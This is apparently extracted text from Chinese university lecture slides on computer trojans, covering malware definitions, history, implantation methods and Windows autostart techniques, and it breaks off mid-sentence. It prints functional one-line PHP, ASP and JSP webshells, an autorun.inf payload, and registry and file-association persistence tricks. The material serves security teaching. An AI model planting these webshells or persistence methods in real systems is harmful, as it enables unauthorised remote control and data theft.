網(wǎng)絡(luò)攻防原理與技術(shù) 第4版 課件匯 吳禮發(fā) 第7-14章 計(jì)算機(jī)木馬-入侵檢測(cè)與網(wǎng)絡(luò)欺騙

本PPT是機(jī)械工業(yè)出版社出版的教材《網(wǎng)絡(luò)攻防原理與技術(shù)（第3版）》配套教學(xué)PPT（部分內(nèi)容的深度和廣度比教材有所擴(kuò)展），作者：吳禮發(fā)，洪征，李華波本PPT可能會(huì)直接或間接采用了網(wǎng)上資源或公開學(xué)術(shù)報(bào)告中的部分PPT頁面、圖片、文字，引用時(shí)我們力求在該P(yáng)PT的備注欄或標(biāo)題欄中注明出處，如果有疏漏之處，敬請(qǐng)諒解。同時(shí)對(duì)被引用資源或報(bào)告的作者表示誠摯的謝意！本PPT可免費(fèi)使用、修改，使用時(shí)請(qǐng)保留此頁。聲明第七章計(jì)算機(jī)木馬內(nèi)容提綱2木馬的工作原理3木馬隱藏技術(shù)4惡意代碼1惡意代碼檢測(cè)與防御一、定義惡意代碼(maliciouscode)：執(zhí)行惡意功能的計(jì)算機(jī)代碼不同廠商（或?qū)W術(shù)機(jī)構(gòu)）在惡意代碼的分類（一般都包括病毒、蠕蟲和木馬，其它的則有所不同）和定義上有所不同不同時(shí)間段內(nèi)，惡意代碼的分類和定義也會(huì)有變化惡意代碼美國科恩博士（最早定義）：計(jì)算機(jī)病毒是一種計(jì)算機(jī)程序，它通過修改其他程序把自己的一個(gè)拷貝或演化的拷貝插入到其他程序中實(shí)施感染傳染特性，即病毒可以自我繁殖演化特性，即病毒在感染過程中可以改變自身的一些特征，以逃避查殺計(jì)算機(jī)病毒賽門鐵克PeterSzor給出定義：計(jì)算機(jī)病毒是一種計(jì)算機(jī)程序，它遞歸地、明確地復(fù)制自己或其演化體。“明確遞歸”來區(qū)別病毒與正常程序的復(fù)制過程，“遞歸”反映了一個(gè)文件在被病毒感染以后會(huì)進(jìn)一步感染其他文件，“明確”強(qiáng)調(diào)了自我復(fù)制是病毒的主要功能。計(jì)算機(jī)病毒《中華人民共和國計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》(1994.2.18)的第二十八條：“計(jì)算機(jī)病毒，是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù)，影響計(jì)算機(jī)使用，并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。計(jì)算機(jī)病毒幾個(gè)典型特性傳染性潛伏性可觸發(fā)性寄生性非授權(quán)執(zhí)行性破壞性計(jì)算機(jī)病毒典型計(jì)算機(jī)病毒基于功能模塊引導(dǎo)模塊搜索模塊感染模塊表現(xiàn)模塊標(biāo)識(shí)模塊計(jì)算機(jī)病毒計(jì)算機(jī)蠕蟲（Worm）：一種可以獨(dú)立運(yùn)行，并通過網(wǎng)絡(luò)傳播的惡性代碼。具有計(jì)算機(jī)病毒的一些特性，如傳播性、隱蔽性、破壞性等，但蠕蟲也具有自己的特點(diǎn)，如漏洞依賴性等，需要通過網(wǎng)絡(luò)系統(tǒng)漏洞進(jìn)行傳播，另外蠕蟲也不需要宿主文件，有的蠕蟲甚至只存在于內(nèi)存中計(jì)算機(jī)蠕蟲典型計(jì)算機(jī)蠕蟲基于功能模塊搜索模塊攻擊模塊傳輸模塊負(fù)載模塊控制模塊計(jì)算機(jī)蠕蟲計(jì)算機(jī)木馬RFC1244(RequestforComments:1244)中是這樣描述木馬的:

“木馬是一種程序，它能提供一些有用的，或是僅僅令人感興趣的功能，但是它還有用戶所不知道的其他功能，例如在你不了解的情況下拷貝文件或竊取你的密碼。”

計(jì)算機(jī)木馬RFC1244的定義可以澄清一些模糊概念：首先木馬程序并不一定實(shí)現(xiàn)某種對(duì)用戶來說有意義或有幫助的功能，但卻會(huì)實(shí)現(xiàn)一些隱藏的、危險(xiǎn)的功能；其次木馬所實(shí)現(xiàn)的主要功能并不為受害者所知，只有程序編制者最清楚。第三，這個(gè)定義暗示“有效負(fù)載”是惡意的。計(jì)算機(jī)木馬目前，大多數(shù)安全專家統(tǒng)一認(rèn)可的定義是：木馬是一段能實(shí)現(xiàn)有用的或必需的功能的程序，但是同時(shí)還完成一些不為人知的功能。計(jì)算機(jī)木馬木馬程序具有很大的危害性，主要表現(xiàn)在:自動(dòng)搜索已中木馬的計(jì)算機(jī)；管理對(duì)方資源，如復(fù)制文件、刪除文件、查看文件內(nèi)容、上傳文件、下載文件等；跟蹤監(jiān)視對(duì)方屏幕；直接控制對(duì)方的鍵盤、鼠標(biāo)；隨意修改注冊(cè)表和系統(tǒng)文件；共享被控計(jì)算機(jī)的硬盤資源；監(jiān)視對(duì)方任務(wù)且可終止對(duì)方任務(wù)；遠(yuǎn)程重啟和關(guān)閉機(jī)器。計(jì)算機(jī)木馬從木馬所實(shí)現(xiàn)的功能角度可分為：破壞型密碼發(fā)送型遠(yuǎn)程訪問型鍵盤記錄木馬DoS攻擊木馬代理木馬反彈端口型木馬從木馬形態(tài)上分，可以分為有文件木馬和無文件木馬有文件木馬：木馬本身是一個(gè)可執(zhí)行文件無文件木馬：木馬不是一個(gè)可執(zhí)行文件，需要依靠其它軟件來觸發(fā)執(zhí)行計(jì)算機(jī)木馬無文件木馬：木馬不是一個(gè)獨(dú)立可執(zhí)行的文件，而是通過特定方式隱藏在其它文件中，通過其它軟件來觸發(fā)執(zhí)行。例如：Office文檔中的宏；一段可解釋執(zhí)行的語言代碼，如Java、Python代碼段；Shell腳本；配置文件中一段腳本；注冊(cè)表中的一個(gè)鍵值等。通常功能比較簡(jiǎn)單，只是攻擊的第一步，執(zhí)行后再下載更多的攻擊代碼到目標(biāo)機(jī)器中計(jì)算機(jī)木馬計(jì)算機(jī)木馬一句話木馬是指只有一行代碼的木馬，利用Web編程語言（asp、php、jsp、aspx）的某個(gè)函數(shù)來執(zhí)行攻擊命令，也稱為webshell。PHP一句話木馬示例：<?phpeval($_POST[sb])?><?phpassert($_POST[sb]);?><?$_POST['sa']($_POST['sb'],$_POST['sc'])?><?php@eval($_POST['cmd']);?>計(jì)算機(jī)木馬木馬ASP一句話木馬示例：<%evalrequest("sb")%><%executerequest("sb")%><%'<%loop<%:%><%executerequest("sb")%><%ExecuteGlobalrequest("sb")%>JSP一句話木馬示例：<%

if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());

%>微軟表示，在2020年8月至2021年1月期間，每月檢測(cè)到大約14萬個(gè)網(wǎng)絡(luò)惡意shell，相比去年報(bào)告的7.7萬個(gè)，幾乎翻了一倍其它：一句話木馬討論：一句話木馬是不是無文件木馬？計(jì)算機(jī)木馬病毒、蠕蟲、木馬的區(qū)別惡意代碼二、惡意代碼概念的演變2000年以前：病毒時(shí)代背景：DOS退場(chǎng)，Windows9x/NT廣泛應(yīng)用，促進(jìn)了網(wǎng)絡(luò)應(yīng)用進(jìn)入日常生活中在DOS時(shí)代，感染式病毒（Virus）、蠕蟲（Worm）和特洛伊木馬（Trojan），都是相對(duì)窄而互斥的技術(shù)概念：Virus是主流惡意代碼概念的發(fā)展史2000~2005：蠕蟲大爆發(fā)時(shí)代Happy99蠕蟲利用劫持電子郵件的方式傳播并快速流行，拉開了蠕蟲時(shí)代大幕2011年：紅色代碼（CodeRed）及其變種“紅色代碼II”（CodeRedII）大爆發(fā)：掃描溢出型蠕蟲的典型代表惡意代碼概念的發(fā)展史2005~2010：木馬泛濫時(shí)代隨著端系統(tǒng)的安全性的提高（DEP、ALSR等技術(shù)的應(yīng)用），蠕蟲的影響開始減弱2005年，以灰鴿子、冰河為代表的遠(yuǎn)程控制程序在技術(shù)上趨于成熟，感染數(shù)量持續(xù)增加2007~2009：地下經(jīng)濟(jì)運(yùn)作日趨“成熟”，基于木馬的黑色產(chǎn)業(yè)鏈2007年上半年：毒王“AV終結(jié)者”惡意代碼概念的發(fā)展史2010~2020：虛擬貨幣和隱秘網(wǎng)絡(luò)帶動(dòng)的勒索新對(duì)抗2013年開始，勒索軟件、挖礦木馬逐步泛濫2016：Mirai爆發(fā)，致癱Dyn2017：WannaCry全球大爆發(fā)2019：WannaMine挖礦木馬爆發(fā)惡意代碼概念的發(fā)展史惡意代碼種類

2007年下半年新增病毒的比例（瑞星）惡意代碼種類

2018年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告惡意代碼種類

2019年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告惡意代碼種類

2019年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告360惡意代碼種類傳統(tǒng)意義上的病毒越來越少，當(dāng)前主流惡意代碼形式是木馬（占絕大多數(shù)）和蠕蟲不同惡意代碼形式的界限越來越模糊，采用的技術(shù)有融合的趨勢(shì)惡意代碼內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼1惡意代碼檢測(cè)與防御遠(yuǎn)程控制木馬木馬體系結(jié)構(gòu)：C/S架構(gòu)，木馬程序+控制端程序木馬程序即是服務(wù)器端程序?？刂贫顺绦蜃鳛榭蛻舳?，用于攻擊者遠(yuǎn)程控制被植入木馬的機(jī)器。遠(yuǎn)程控制木馬與遠(yuǎn)程控制軟件的區(qū)別?隱蔽性:木馬被隱藏，避免被發(fā)現(xiàn)；非授權(quán)性：木馬程序不經(jīng)授權(quán)控制主機(jī)遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制配置木馬：通信配置：監(jiān)聽端口、DNS、IP等功能配置：文件讀取、鍵盤監(jiān)聽、截屏等安裝配置：安裝路徑、文件名、是否刪除安裝文件、注冊(cè)表啟動(dòng)項(xiàng)等配置木馬案例：冰河木馬的配置界面配置木馬遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制傳播木馬：木馬植入木馬植入技術(shù)可以大概分為主動(dòng)植入與被動(dòng)植入兩類。主動(dòng)植入：攻擊者主動(dòng)將木馬程序種到本地或者是遠(yuǎn)程主機(jī)上，這個(gè)行為過程完全由攻擊者主動(dòng)掌握。被動(dòng)植入：攻擊者預(yù)先設(shè)置某種環(huán)境，然后被動(dòng)等待目標(biāo)系統(tǒng)用戶的某種可能的操作，只有這種操作執(zhí)行，木馬程序才有可能植入目標(biāo)系統(tǒng)。1、主動(dòng)植入主動(dòng)植入一般需要通過某種方法獲取目標(biāo)主機(jī)的一定權(quán)限，然后由攻擊者自己動(dòng)手進(jìn)行安裝。按照目標(biāo)系統(tǒng)是本地還是遠(yuǎn)程的區(qū)分，這種方法又有本地安裝與遠(yuǎn)程安裝之分。1、主動(dòng)植入由于在一個(gè)系統(tǒng)植入木馬，不僅需要將木馬程序上傳到目標(biāo)系統(tǒng)，還需要在目標(biāo)系統(tǒng)運(yùn)行木馬程序，所以主動(dòng)植入需要具有目標(biāo)系統(tǒng)的寫權(quán)限和可執(zhí)行權(quán)限。如果僅僅具有寫權(quán)限，只能將木馬程序上傳但不能執(zhí)行，這種情況屬于被動(dòng)植入，因?yàn)槟抉R仍然需要被動(dòng)等待以某種方式被執(zhí)行。（1）本地安裝本地安裝就是直接在本地主機(jī)上進(jìn)行安裝。一個(gè)人很難確保除了自己之外自己的計(jì)算機(jī)不會(huì)被其他人使用。而在經(jīng)常更換使用者的公共場(chǎng)所（如網(wǎng)吧、飯店、賓館、咖啡店等）的計(jì)算機(jī)上，這種安裝木馬的方法更是非常普遍、有效。（2）遠(yuǎn)程安裝遠(yuǎn)程安裝就是通過常規(guī)攻擊手段獲得目標(biāo)主機(jī)的一定權(quán)限后，將木馬上傳到目標(biāo)主機(jī)上，并使其運(yùn)行起來。例如，某些系統(tǒng)漏洞的存在，使得攻擊者可以利用漏洞遠(yuǎn)程將木馬程序上傳并執(zhí)行。從實(shí)現(xiàn)方式上，主要分為：利用系統(tǒng)自身漏洞植入利用第三方軟件漏洞植入（3）利用系統(tǒng)自身漏洞植入這是一種主動(dòng)攻擊的方式。攻擊者利用所了解的系統(tǒng)的安全漏洞及其特性主動(dòng)出擊。如IIS服務(wù)器的溢出漏洞，通過一個(gè)“IISHack”的攻擊程序就可使IIS服務(wù)器崩潰，并同時(shí)在被攻擊服務(wù)器執(zhí)行“木馬”程序。MIME漏洞則是利用InternetExplorer在處理不正常的MIME類型存在的問題，攻擊者有意地更改MIME類型，使IE可以不提示用戶而直接運(yùn)行電子郵件附件中的惡意程序等。（4）利用第三方軟件漏洞植入每臺(tái)主機(jī)上都會(huì)安裝一些第三方軟件或者提供服務(wù)，但是這些軟件可能存在可被利用的漏洞，如果被惡意者利用，你的主機(jī)就可以成為木馬的“棲息地”。例如：AT-TFTPServer在處理帶有超長文件名參數(shù)的請(qǐng)求時(shí)存在漏洞，遠(yuǎn)程攻擊者可能利用此漏洞在服務(wù)器上執(zhí)行任意指令。2、被動(dòng)植入被動(dòng)植入主要是利用以下方式將木馬程序植入目標(biāo)系統(tǒng)：網(wǎng)頁瀏覽植入利用電子郵件植入利用網(wǎng)絡(luò)下載植入利用即時(shí)通工具植入與其它程序捆綁利用移動(dòng)存儲(chǔ)設(shè)備植入（1）網(wǎng)頁瀏覽植入網(wǎng)頁瀏覽傳播：利用Script/ActiveX控件/JavaApplet等編寫出一個(gè)HTML網(wǎng)頁，當(dāng)我們?yōu)g覽該頁面時(shí)，會(huì)在后臺(tái)將木馬程序下載到計(jì)算機(jī)緩存中，然后修改系統(tǒng)注冊(cè)表，使相關(guān)鍵值指向“木馬”程序。還可以利用瀏覽器的已知或者未知的漏洞，把木馬下載到本機(jī)并運(yùn)行。水坑攻擊（Wateringhole）：在受害者必經(jīng)之路設(shè)置一個(gè)“水坑(陷阱)”。最常見的做法是，黑客分析攻擊目標(biāo)的上網(wǎng)活動(dòng)規(guī)律，尋找攻擊目標(biāo)經(jīng)常訪問的網(wǎng)站的弱點(diǎn)，先將此網(wǎng)站“攻破”并植入攻擊代碼，一旦攻擊目標(biāo)訪問該網(wǎng)站就會(huì)“中招”（2）水坑攻擊2020.2.19：黑客利用后門對(duì)香港iOS用戶發(fā)起水坑攻擊（2）水坑攻擊威瑞森的報(bào)告顯示，94%的惡意軟件通過電子郵件傳播，排名第一的社會(huì)工程攻擊是網(wǎng)絡(luò)釣魚（3）利用電子郵件植入（3）利用電子郵件植入電子郵件（E-mail）進(jìn)行傳播：攻擊者將“木馬”程序偽裝成E-mail附件的形式發(fā)送出去，收信人只要查看郵件附件就會(huì)使“木馬”程序得到運(yùn)行并安裝進(jìn)入系統(tǒng)。通過在郵件內(nèi)容內(nèi)嵌WSH(WindowsScriptsHost)腳本，用戶不需要打開附件，僅僅瀏覽一下郵件的內(nèi)容，附件中的木馬就會(huì)被執(zhí)行。附件文檔中不包含惡意代碼，而是下載惡意代碼的鏈接例一例二惡意Office文件樣本不利用漏洞，也未包含可疑的宏或VBA等操作，而是單純的利用XML連接外部開啟另一個(gè)惡意文件例三利用電子郵件植入（4）網(wǎng)絡(luò)下載植入一些非正規(guī)的網(wǎng)站以提供軟件下載為名，將木馬程序偽裝成用戶所希望的其它軟件，當(dāng)用戶下載安裝時(shí)，實(shí)際上所安裝的是木馬程序。（5）利用即時(shí)通工具植入即時(shí)通工具有文件傳輸功能，所以現(xiàn)在也有很多木馬通過它傳播。攻擊者通常把木馬服務(wù)器程序通過合并軟件和其他的可執(zhí)行文件綁在一起，然后騙你說是一個(gè)好玩的東東或者是漂亮MM的照片，你接受后運(yùn)行的話，你就成了木馬的犧牲品了。（6）與其它程序或文檔捆綁將木馬與其它軟件捆綁，用戶在下載安裝其它軟件時(shí)就不自覺地也安裝了木馬，這種情況下用戶很難察覺。攻擊者還可以在.doc、.ppt、.rar、.zip、.mpg、.pdf等文件中插入惡意代碼，當(dāng)用戶打開這些文檔時(shí)，就會(huì)被植入木馬。例：圖片木馬有一種圖片木馬，利用用戶認(rèn)為圖片文件不可執(zhí)行，因此不可能是木馬這樣的心理來欺騙受害者。實(shí)際上這是一個(gè)后綴名的小把戲。由于Windows系統(tǒng)默認(rèn)不顯示已經(jīng)注冊(cè)了的文件類型的后綴名，因此test.jpg.exe這種文件在系統(tǒng)上就顯示為test.jpg，木馬再采用和圖片文件一樣的圖標(biāo)，對(duì)大多數(shù)用戶而言，是極具欺騙性的。（7）利用移動(dòng)存儲(chǔ)設(shè)備植入利用移動(dòng)存儲(chǔ)設(shè)備傳播：利用Windows的Autoplay(autorun.inf)機(jī)制，當(dāng)插入U(xiǎn)盤、移動(dòng)硬盤或者光盤時(shí)，可以自動(dòng)執(zhí)行惡意程序。[AutoRun]open=scvhost.exeshellexecute=scvhost.exeshell\Auto\command=scvhost.exe“擺渡”木馬①植入外網(wǎng)主機(jī)“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集⑤敏感信息轉(zhuǎn)移“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集⑤敏感信息轉(zhuǎn)移⑥敏感信息泄露2015.12.2夜間：安天監(jiān)控預(yù)警體系感知到如下線索：某知名作家在新浪微博發(fā)布消息，曝光有人以發(fā)送“采訪提綱”為借口，利用微博私信功能，發(fā)送惡意代碼鏈接。（8）社會(huì)工程學(xué)2015.12.2夜間：安天監(jiān)控預(yù)警體系感知到如下線索：某知名作家在新浪微博發(fā)布消息，曝光有人以發(fā)送“采訪提綱”為借口，利用微博私信功能，發(fā)送惡意代碼鏈接。（8）社會(huì)工程學(xué)（8）社會(huì)工程學(xué)無論是原始微博截圖中的頭像、微博兩條搜索結(jié)果顯示的圖像，還是百度網(wǎng)盤的頭像，相似度都非常高，讓人真假難辨。（8）社會(huì)工程學(xué)幸運(yùn)的是，沒有微博名人中招?。?）社會(huì)工程學(xué)社會(huì)工程學(xué)（8）社會(huì)工程學(xué)通過云應(yīng)用投放惡意代碼遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制自動(dòng)加載技術(shù)木馬程序在被植入目標(biāo)主機(jī)后，不可能寄希望于用戶雙擊其圖標(biāo)來運(yùn)行啟動(dòng)，只能不動(dòng)聲色地自動(dòng)啟動(dòng)和運(yùn)行，攻擊才能以此為依據(jù)侵入被侵主機(jī)，完成控制。自動(dòng)加載技術(shù)在Windows系統(tǒng)中木馬程序的自動(dòng)加載技術(shù)主要有：修改系統(tǒng)文件修改系統(tǒng)注冊(cè)表添加系統(tǒng)服務(wù)修改文件打開關(guān)聯(lián)屬性修改任務(wù)計(jì)劃修改組策略利用系統(tǒng)自動(dòng)運(yùn)行的程序修改啟動(dòng)文件夾替換系統(tǒng)DLL(1)修改系統(tǒng)文件木馬程序一般會(huì)在第一次運(yùn)行時(shí)，修改目標(biāo)系統(tǒng)文件以達(dá)到自動(dòng)加載的目的在早于WindwosXP版本的系統(tǒng)上，System.ini、Win.ini、Winstart.bat、Autoexec.bat等都是木馬所關(guān)注的配置文件。這些文件能自動(dòng)被Windows在啟動(dòng)時(shí)加載運(yùn)行，木馬將自身程序加入此類批處理文件，能夠達(dá)成開機(jī)啟動(dòng)的目標(biāo)。這些文件雖然在后續(xù)版本的Windows系統(tǒng)上依然存在，但主要出于兼容早期系統(tǒng)的需要，很難再被木馬繼續(xù)利用(2)修改系統(tǒng)注冊(cè)表系統(tǒng)注冊(cè)表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。在WinNT系列操作系統(tǒng)上，Windows主要使用注冊(cè)表存儲(chǔ)包括開機(jī)啟動(dòng)項(xiàng)目的系統(tǒng)配置，修改注冊(cè)表隱蔽性相對(duì)較高，木馬常常采用這種方法實(shí)現(xiàn)開機(jī)自啟動(dòng)。通常被攻擊者用作開機(jī)啟動(dòng)的主鍵（在不同版本的系統(tǒng)中可能存在不同的主鍵）包括：(2)修改系統(tǒng)注冊(cè)表系統(tǒng)注冊(cè)表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx（在Win2000、WinXp中有效）、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中，HKEY_LOCAL_MACHINE對(duì)當(dāng)前系統(tǒng)的所有用戶有效，HKEY_CURRENT_USER僅對(duì)當(dāng)前登陸的用戶有效(2)修改系統(tǒng)注冊(cè)表系統(tǒng)注冊(cè)表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx（在Win2000、WinXp中有效）、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中，Runonce主鍵設(shè)置的自啟動(dòng)程序?qū)⒃谙乱淮蜗到y(tǒng)啟動(dòng)時(shí)獲得自動(dòng)運(yùn)行的機(jī)會(huì)，并在運(yùn)行后從該主鍵移除。木馬程序如果利用這個(gè)主鍵進(jìn)行自啟動(dòng)，則木馬的運(yùn)行通常有一個(gè)固定的操作，即需要在運(yùn)行后重新將自身加入到Runonce主鍵中，確保自己在每次系統(tǒng)啟動(dòng)時(shí)均獲得運(yùn)行機(jī)會(huì)(3)添加系統(tǒng)服務(wù)WindowsNT內(nèi)核操作系統(tǒng)都大量使用服務(wù)來實(shí)現(xiàn)關(guān)鍵的系統(tǒng)功能。一些木馬將自身注冊(cè)為系統(tǒng)服務(wù)，并將相應(yīng)服務(wù)設(shè)置為系統(tǒng)開機(jī)時(shí)自啟動(dòng)。例如，WindowsResourceKit工具包（其中包含的工具可能會(huì)根據(jù)用戶使用的Windows版本而有所不同）中的程序instsrv.exe常常被木馬用來創(chuàng)建系統(tǒng)服務(wù)，服務(wù)的管理和配置可以通過程序sc.exe來實(shí)施。這樣每當(dāng)Windows系統(tǒng)啟動(dòng)時(shí)，即使沒有用戶登錄，木馬也會(huì)自動(dòng)開始工作。作為服務(wù)啟動(dòng)的木馬往往隱蔽性更強(qiáng)，一般用戶很難從服務(wù)中找出木馬程序(4)修改文件打開關(guān)聯(lián)屬性通常對(duì)于一些常用的文件如.txt文件，只要雙擊文件圖標(biāo)就能打開這個(gè)文件。這是因?yàn)樵谙到y(tǒng)注冊(cè)表中，已經(jīng)把這類文件與某個(gè)程序關(guān)聯(lián)起來，只要用戶雙擊該類文件，系統(tǒng)就自動(dòng)啟動(dòng)相關(guān)聯(lián)的程序來打開文件。修改文件打開關(guān)聯(lián)屬性是木馬程序的常用手段。比如：正常情況下.txt文件的打開方式為notepad.exe文件，而木馬可能將這類文件的關(guān)聯(lián)程序修改為木馬程序，這樣只要打開此類文件，就能在無意中啟動(dòng)木馬。案例：冰河木馬。例：冰河的自動(dòng)加載方法

HKEY_CLASSES_ROOT根鍵中記錄的是Windows操作系統(tǒng)中所有數(shù)據(jù)文件的信息，主要記錄不同文件的文件名后綴和與之對(duì)應(yīng)的應(yīng)用程序。

“冰河”就是通過修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的鍵值，將“C:\WINDOWS\NOTEPAD.EXE%1”

改為“C:\WINDOWS\SYSTEM\SYSEXPLR.EXE%1”，這樣一旦你雙擊一個(gè)TXT文件，原本應(yīng)用Notepad打開該文件的，現(xiàn)在卻變成啟動(dòng)木馬程序了。

不同版本W(wǎng)indows系統(tǒng)的鍵名有差異！修改文件打開關(guān)聯(lián)不僅僅是TXT文件，其它諸如HTM、ZIP、RAR等都是木馬的目標(biāo)。對(duì)付這類木馬，只能經(jīng)常檢查HKEY_CLASSES_ROOT\文件類型\shell\open\command主鍵，查看其鍵值是否正常。(5)修改任務(wù)計(jì)劃在默認(rèn)情況下，任務(wù)計(jì)劃程序隨Windows一起啟動(dòng)并在后臺(tái)運(yùn)行。如果把某個(gè)程序添加到計(jì)劃任務(wù)文件夾，并將計(jì)劃任務(wù)設(shè)置為“系統(tǒng)啟動(dòng)時(shí)”或“登錄時(shí)”，這樣也可以實(shí)現(xiàn)程序自啟動(dòng)。Windows10WindowsXP(6)修改組策略在“開始”→“運(yùn)行”中輸入“gpedit.msc"。按回車，打開系統(tǒng)組策略窗口，選擇“計(jì)算機(jī)配置”→“管理模板”→“系統(tǒng)”→“登錄”，雙擊右邊的“在用戶登錄時(shí)運(yùn)行這些程序”項(xiàng)。（6）修改組策略（續(xù)）打開其屬性對(duì)話框，選擇“已啟用”，再單擊“顯示”，會(huì)彈出“顯示內(nèi)容”對(duì)話框，列表中顯示的便是藏身于此的自啟動(dòng)程序。如果你也想在這里添加自啟動(dòng)項(xiàng)目，可單擊“添加”在出現(xiàn)的“添加項(xiàng)目”對(duì)話框中輸入可執(zhí)行文件的完整路徑和文件名，“確定”即可。(7)修改啟動(dòng)文件夾當(dāng)前登陸用戶的“啟動(dòng)”文件夾這是許多應(yīng)用軟件自啟動(dòng)的常用位置。當(dāng)前登陸用戶的“啟動(dòng)”文件夾一般在：C:\DocumentsandSettings\<用戶名字>\「開始」菜單\程序\啟動(dòng)\對(duì)所有用戶有效的啟動(dòng)文件夾不管用戶用什么身份登錄系統(tǒng)，放入該文件夾的快捷方式總是自動(dòng)啟動(dòng)——這是它與用戶專有的啟動(dòng)文件夾的區(qū)別所在。該文件夾一般在：C:\DocumentsandSettings\AllUsers\「開始」菜單\程序\啟動(dòng)\(8)利用系統(tǒng)自動(dòng)運(yùn)行的程序在Windows系統(tǒng)中，有很多程序是可以自動(dòng)運(yùn)行的，如：在對(duì)磁盤進(jìn)行格式化后，總是要運(yùn)行“磁盤掃描”程序（Scandisk.exe）；按下F1鍵時(shí)，系統(tǒng)將運(yùn)行Winhelp.exe或Hh.exe打開幫助文件；系統(tǒng)啟動(dòng)時(shí)，將自動(dòng)啟動(dòng)系統(tǒng)欄程序SysTray.exe、注冊(cè)表檢查程序scanreg.exe、計(jì)劃任務(wù)程序mstask.exe、輸入法程序、電源管理程序等。這為惡意程序提供了機(jī)會(huì)，通過覆蓋相應(yīng)文件就可獲得自動(dòng)啟動(dòng)的機(jī)會(huì)，而不必修改系統(tǒng)任何設(shè)置。(9)替換系統(tǒng)DLL這種方法通過APIHOOK啟動(dòng)，也稱為DLL陷阱技術(shù)。通過替換Windows系統(tǒng)中正常的DLL文件（動(dòng)態(tài)鏈接文件），如kernel32.dll和user32.dll這些隨系統(tǒng)一起啟動(dòng)的dll。啟動(dòng)之后，如果是系統(tǒng)正常的調(diào)用請(qǐng)求，它就把請(qǐng)求轉(zhuǎn)到原先的DLL進(jìn)行處理，如果是約定的木馬操作，則該DLL文件就實(shí)現(xiàn)木馬服務(wù)器端功能?，F(xiàn)代操作系統(tǒng)對(duì)此已有防護(hù)，已很難實(shí)施有些木馬需要系統(tǒng)重啟后運(yùn)行或提升權(quán)限，如何做到？（10）其它遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制建立連接木馬控制端木馬服務(wù)端InternetIntranet控制流木馬的常規(guī)通信方式建立連接A控制端A服務(wù)端1037762676266016(1)建立連接前(2)獲取服務(wù)端IP(3)木馬連接建立通過信息反饋或IP掃描獲得服務(wù)器IP地址木馬端口（服務(wù)端IP）（控制端IP）服務(wù)端口遠(yuǎn)程控制木馬的反彈技術(shù)控制端感染木馬的主機(jī)優(yōu)點(diǎn)：解決動(dòng)態(tài)IP地址的問題；解決內(nèi)網(wǎng)地址的問題；繞過防火墻的限制；缺點(diǎn)：容易暴露控制端反彈遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制遠(yuǎn)程控制技術(shù)木馬連接建立后，客戶端端口和服務(wù)器端口之間將會(huì)出現(xiàn)一條通道，客戶端程序可由這條通道與服務(wù)器上的木馬程序取得聯(lián)系，并對(duì)其進(jìn)行遠(yuǎn)程控制，主要包括：獲取目標(biāo)機(jī)器信息記錄用戶事件遠(yuǎn)程操作(1)獲取目標(biāo)機(jī)器信息木馬的一個(gè)主要功能就是竊取被控端計(jì)算機(jī)的信息，然后再把這些信息通過網(wǎng)絡(luò)連接傳送到控制端。一般來講，獲取目標(biāo)機(jī)器信息的方法就是調(diào)用相關(guān)的API，通過函數(shù)返回值，進(jìn)行分解和分析有關(guān)成分，進(jìn)而得到相關(guān)信息。(2)記錄用戶事件木馬程序